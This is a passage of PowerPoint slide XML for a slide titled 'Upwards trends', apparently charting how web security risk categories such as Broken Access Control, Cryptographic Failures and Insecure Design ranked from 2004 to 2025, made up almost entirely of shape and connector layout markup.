          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6251760" y="3910140"/>
            <a:ext cx="341640" cy="1488600"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="3333CC">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1314" name="Straight Arrow Connector 94">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7B76791-E9E3-0B40-85DC-9132556DB918}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4922280" y="5395680"/>
            <a:ext cx="407160" cy="360"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="53975">
            <a:solidFill>
              <a:srgbClr val="3333CC">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1316" name="Connector: Curved 133">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1B25FF9-4862-29FD-CAF9-D4B97AF893F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="1201" idx="3"/>
            <a:endCxn id="1293" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7517880" y="1925280"/>
            <a:ext cx="357480" cy="975240"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50403"/>
              <a:gd name="adj2" fmla="val 50036"/>
              <a:gd name="adj3" fmla="val 49596"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="FFD8CE"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1317" name="Connector: Curved 127">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2539D4D-E4F2-98D7-F6C2-4E8AC5F9373F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="1221" idx="3"/>
            <a:endCxn id="1295" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7517880" y="2403720"/>
            <a:ext cx="357480" cy="1506600"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50403"/>
              <a:gd name="adj2" fmla="val 49976"/>
              <a:gd name="adj3" fmla="val 49596"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="3333CC">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1315" name="Connector: Curved 130">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF8CAEEB-9F46-CB31-64EC-EA53C4246E79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1207" idx="3"/>
            <a:endCxn id="1305" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7517880" y="2421540"/>
            <a:ext cx="361440" cy="974880"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 43879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89" name="Connector: Curved 114">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A39B2927-465A-44C3-09D6-720577E95CDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1234" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3695400" y="4227121"/>
            <a:ext cx="171720" cy="1159379"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="FFD8CE"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="none" w="sm" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1256" name="Connector: Curved 79">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D206DA3-72DE-2A14-FD2F-FF0E720C9174}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1230" idx="3"/>
            <a:endCxn id="1226" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3695400" y="4406220"/>
            <a:ext cx="343440" cy="48564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74" name="Connector: Curved 99">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9707A8F-5FEA-B132-BDD2-F9BCA9601353}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1211" idx="3"/>
            <a:endCxn id="1216" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4966560" y="2917980"/>
            <a:ext cx="35928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59" name="Connector: Curved 110">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C7460C2-5608-2A7E-DB52-A4FD02094521}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1219" idx="3"/>
            <a:endCxn id="1245" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3695400" y="3414060"/>
            <a:ext cx="342720" cy="488520"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="808080">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3" name="Connector: Curved 77">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81C197AB-DB6A-96BB-6974-772A54AE4800}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2420280" y="1419840"/>
            <a:ext cx="349560" cy="505440"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000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3150598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CAF68-73A3-BB8C-DDF1-3513FBAEF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CustomShape 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D739047-43FB-9B32-23CD-99B8534CDF8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1485360" y="171612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309" name="TextBox 188">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB2C434D-A74C-6E38-2210-E5F968D3E162}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384480" y="957600"/>
            <a:ext cx="8374680" cy="275545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="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0" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>2004                        2007                        2010                         2013                       2017                         2021                        2025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291" name="Connector: Curved 116">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B419DFDD-2DE9-1C34-4431-E59A9F960340}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1242" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4966560" y="4163445"/>
            <a:ext cx="179640" cy="1731375"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="CCCCCC"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="none" w="med" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1187" name="PlaceHolder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27B74A47-36FF-557A-0469-0D47BAF0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80" y="157500"/>
            <a:ext cx="8224560" cy="80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 algn="ctr" defTabSz="446040">
              <a:lnSpc>
                <a:spcPct val="116000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C5000B"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Upwards trends</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" b="0" strike="noStrike" spc="-1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1188" name="PlaceHolder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5F6FB10-6246-BA9A-D462-0B57A1CBEB1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="73"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7884360" y="6211440"/>
            <a:ext cx="775080" cy="469440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" numCol="1" spcCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="0" algn="r" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="116000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr indent="0" algn="r" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="116000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{E01EDF43-9989-4485-A3FE-CFD0EC2751AF}" type="slidenum">
              <a:rPr lang="en-US" sz="120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53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189" name="Connector: Curved 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2BF61C5-133B-1D71-EC7D-610EF4A00BA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1216" idx="3"/>
            <a:endCxn id="1195" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6251760" y="1429380"/>
            <a:ext cx="341640" cy="19846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sm" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1190" name="CustomShape 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B59F959-2276-8510-FEAA-E31C334D65E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238680" y="122004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Unvalidated Input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1" name="CustomShape 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB4FA842-950E-F4CB-B438-6326DF05B3C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1485360" y="122004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2" name="CustomShape 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDF50241-0CF6-3A63-FBBD-2CFC7B161EFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2765880" y="122004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3" name="CustomShape 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33C15EE4-C99C-76F4-9171-C050FFB5C110}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5325840" y="122004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4" name="CustomShape 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72CCE0A9-770B-F8F2-82A3-97281061F89F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038840" y="122004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5" name="CustomShape 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EB68965-D93C-C962-311D-B06891A0A9DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6593400" y="122004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solidFill>
              <a:srgbClr val="CCCC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pc="-1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>Broken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" spc="-1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" spc="-1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>Access Control</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000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6" name="CustomShape 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C6F1737-88E1-6220-CF67-1859BC502247}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226080" y="1716120"/>
            <a:ext cx="93780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Broken Access Control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8" name="CustomShape 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9AB4E4B-D91C-14A8-D35C-38FB8433AE29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2765880" y="171468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9" name="CustomShape 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97F19240-1A0B-120A-1BC5-73EDAFC26052}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5325840" y="171612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Broken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 </a:t>
            </a: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Authentication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0" name="CustomShape 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A37A177-603F-05C4-0FA8-54CE59F47B6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038840" y="171612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Broken Auth. &amp; Session Mngt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1" name="CustomShape 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA556ACD-CFD4-0746-38C0-CC9C3F54377C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6593400" y="171612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Cryptographic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 </a:t>
            </a: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Failures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2" name="CustomShape 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18F4B1B3-DBD3-9E5A-DEBA-E347F759069D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238680" y="221220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Broken Auth. &amp; Session Mngt.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3" name="CustomShape 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F87121DD-AA55-EEF5-7E52-2E18592304B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1485360" y="221220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Malicious File Execution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4" name="CustomShape 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8C9F09D-D876-8072-B637-C715651ADB1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2765880" y="220932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Broken Auth. &amp; Session Mngt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5" name="CustomShape 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57C80FF1-1196-8E6F-DC1F-B9974CA322AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5325840" y="221220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Sensitive Data Exposure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6" name="CustomShape 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{973A3D24-CF69-44D6-DCF0-7C28043CBA3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038840" y="221220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7" name="CustomShape 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C140D5F-6758-8516-659A-BBC5E1C112ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6593400" y="221220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8" name="CustomShape 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F7326F9-58BB-4F3D-6C9F-FE8DEC1E9C1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238680" y="270864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9" name="CustomShape 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1233C261-3DA3-A558-51BD-A373354A0133}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1485000" y="270396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0" name="CustomShape 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3A4E17D-6DF0-2F17-4378-025859A73659}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2765880" y="270396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1" name="CustomShape 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{620CAAB4-FF32-99BD-210E-CFEE1B69BAC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038840" y="270864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2" name="CustomShape 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03C71E06-7894-6F53-9E6F-9D2C210FB05C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6593400" y="270864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Insecure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 </a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1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Design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3" name="CustomShape 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BD20678-4384-245B-B221-109BB9D6370C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="239400" y="3204720"/>
            <a:ext cx="911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Buffer Overflows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4" name="CustomShape 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA6B2EF7-613B-8A1E-0ED6-D7D2691E2226}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1485360" y="320472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5" name="CustomShape 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F14966EC-6AF0-A35C-C036-D44B24F01BEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2765880" y="319860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6" name="CustomShape 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A0353F7-56A1-8BA5-EC68-C63AC9930DA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5325840" y="320472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Broken Access Control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7" name="CustomShape 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
